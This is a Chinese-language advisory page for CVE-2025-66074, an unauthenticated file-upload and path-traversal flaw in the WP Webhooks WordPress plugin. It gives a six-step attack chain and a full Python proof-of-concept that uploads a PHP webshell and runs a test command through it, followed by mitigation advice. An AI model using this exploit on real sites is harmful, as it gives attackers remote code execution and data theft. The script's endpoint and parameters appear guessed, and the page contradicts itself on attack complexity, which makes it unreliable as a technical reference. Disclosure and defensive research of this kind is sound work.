CVE-2025-66074 | WordPress WP Webhooks插件任意文件上传漏洞

漏洞信息

漏洞编号

CVE-2025-66074

漏洞类型

任意文件上传

CVSS评分

9.0 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Cozmoslabs WP Webhooks (wp-webhooks)

漏洞概述

CVE-2025-66074是WordPress平台WP Webhooks插件中的一个严重安全漏洞，该漏洞允许未经认证的攻击者通过路径遍历技术实现任意文件上传。WP Webhooks是Cozmoslabs开发的一款广受欢迎的WordPress插件，用于实现webhook集成和自动化工作流程，在WordPress生态系统中拥有大量用户。

该漏洞的核心问题在于插件对用户上传的文件缺乏充分的验证和过滤机制。攻击者可以利用路径遍历字符（如../）绕过安全检查，将恶意文件写入服务器的任意位置。一旦恶意文件成功上传并被执行，攻击者即可获得服务器的完全控制权，包括执行任意代码、安装后门、窃取敏感数据或进一步横向移动。

由于该漏洞的CVSS评分高达9.0（满分10分），属于严重级别，且攻击复杂度较低（AC:H），无需认证（PR:N）和用户交互（UI:N），因此被实际利用的风险极高。任何使用受影响版本WP Webhooks插件的WordPress网站都可能成为攻击目标。

根据Patchstack的安全研究报告，该漏洞已被标记为高危漏洞，并在2025年12月18日公开披露。考虑到WordPress在全球网站中的广泛使用，此漏洞可能影响数百万个网站。网站管理员应立即采取行动，评估受影响范围并实施相应的安全措施。

技术细节

该漏洞属于OWASP Top 10中的"不安全的设计"类别，具体表现为"危险类型文件的无限制上传"与"路径遍历"两种漏洞的组合利用。

漏洞原理分析：
1. 文件上传功能缺陷：WP Webhooks插件在处理文件上传时，未能正确验证上传文件的类型、内容和目标路径。插件允许用户通过webhook触发的动作上传文件，但缺乏对上传文件扩展名、MIME类型和文件内容的严格检查。

2. 路径遍历漏洞：攻击者可以在文件名中插入路径遍历序列（如../或..\），从而突破预定的上传目录限制，将文件写入服务器的其他位置。例如，通过构造类似"../../../var/www/html/shell.php"的文件名，攻击者可以将恶意PHP文件写入Web根目录。

3. 文件执行：一旦恶意文件被写入可执行目录（如WordPress的wp-content目录），攻击者即可通过HTTP请求访问该文件，从而在服务器上执行任意代码。

利用方式：
攻击者通常通过构造特定的HTTP请求来触发文件上传功能，利用路径遍历将webshell上传到Web根目录。然后通过访问webshell实现命令执行、数据库操作或进一步渗透。

受影响范围：
该漏洞影响WP Webhooks插件从某个早期版本到3.3.8的所有版本。

攻击链分析

STEP 1

步骤1: 侦察和信息收集

攻击者首先识别目标WordPress网站，并确认其是否安装了存在漏洞的WP Webhooks插件（版本<=3.3.8）。攻击者可以通过查看页面源码、扫描目录或使用Wappalyzer等工具来识别插件信息。

STEP 2

步骤2: 构造恶意请求

攻击者构造包含路径遍历序列的恶意文件上传请求。在文件名中使用'../../../'等路径遍历字符，目标是突破上传目录限制，将恶意文件写入Web根目录或其他可执行位置。

STEP 3

步骤3: 发送漏洞利用请求

攻击者向WP Webhooks插件的文件上传端点发送精心构造的HTTP POST请求。该请求包含恶意文件名和PHP webshell代码。由于插件缺乏充分的输入验证，请求将被服务器接受并处理。

STEP 4

步骤4: 文件写入和持久化

恶意文件通过路径遍历被写入到攻击者指定的位置（如wp-content/uploads/shell.php）。如果文件被成功写入Web可访问目录，攻击者即可获得持久化的Webshell访问。

STEP 5

步骤5: 远程代码执行

攻击者通过HTTP请求访问上传的webshell，并发送系统命令。由于webshell允许执行任意系统命令，攻击者可以执行whoami、ls等命令来确认服务器状态，并进一步实施渗透攻击。

STEP 6

步骤6: 权限提升和横向移动

获得初始访问权限后，攻击者可以尝试获取数据库凭据（通过读取wp-config.php）、安装后门、窃取敏感数据或利用该服务器作为跳板进行横向移动攻击其他系统。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-66074 - WP Webhooks <= 3.3.8 Arbitrary File Upload PoC
Note: This PoC is for educational and authorized testing purposes only.
"""

import requests
import sys
import os

def exploit_cve_2025_66074(target_url, webshell_content=None):
    """
    Exploit for WP Webhooks arbitrary file upload vulnerability
    via path traversal
    """
    
    print(f"[*] Target: {target_url}")
    print(f"[*] Exploiting CVE-2025-66074 - WP Webhooks File Upload + Path Traversal")
    
    # Webshell content (default PHP webshell)
    if webshell_content is None:
        webshell_content = "<?php system($_GET['cmd']); ?>"
    
    # Target endpoint (typical WP Webhooks upload endpoint)
    upload_endpoint = f"{target_url}/wp-json/wp-webhooks/v1/upload"
    
    # Malicious filename with path traversal
    # This attempts to write to WordPress wp-content directory
    malicious_filename = "../../../wp-content/uploads/shell.php"
    
    # Prepare the malicious file data
    files = {
        'file': (malicious_filename, webshell_content, 'application/x-php')
    }
    
    # Additional data that might be required
    data = {
        'action': 'upload_file',
        'webhook_type': 'file_upload'
    }
    
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
        'Content-Type': 'multipart/form-data'
    }
    
    print(f"[+] Sending malicious upload request...")
    print(f"[+] Target endpoint: {upload_endpoint}")
    print(f"[+] Malicious filename: {malicious_filename}")
    
    try:
        # Send the exploit request
        response = requests.post(
            upload_endpoint,
            files=files,
            data=data,
            headers=headers,
            timeout=30
        )
        
        print(f"[+] Response Status: {response.status_code}")
        print(f"[+] Response Body: {response.text[:500]}")
        
        # Check if upload was successful
        if response.status_code == 200:
            # Try to access the uploaded webshell
            webshell_url = f"{target_url}/wp-content/uploads/shell.php"
            print(f"[+] Webshell uploaded successfully!")
            print(f"[+] Access webshell at: {webshell_url}?cmd=whoami")
            
            # Verify the webshell exists
            verify_response = requests.get(
                f"{webshell_url}?cmd=echo+verified",
                timeout=10
            )
            
            if 'verified' in verify_response.text:
                print("[+] Webshell verification successful!")
                return True
        else:
            print(f"[-] Exploit may have failed. Check manually.")
            return False
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve_2025_66074_poc.py <target_url>")
        print("Example: python cve_2025_66074_poc.py http://example.com")
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    exploit_cve_2025_66074(target)

影响范围

WP Webhooks (wp-webhooks) <= 3.3.8

防御指南

临时缓解措施

在等待官方安全更新期间，建议采取以下临时缓解措施：首先，立即禁用或删除WP Webhooks插件，直到确认可以安全升级；其次，通过Web应用防火墙规则阻止包含'../'、'..\'等路径遍历序列的请求；再次，配置Web服务器禁止上传目录中的PHP文件执行，可通过在uploads目录中添加.htaccess文件（针对Apache）或Nginx配置实现；最后，限制wp-content目录的写权限，仅允许WordPress核心进程写入。如果业务必须使用该插件，应实施严格的访问控制，限制可触发webhook操作的IP地址范围，并启用详细的访问日志监控。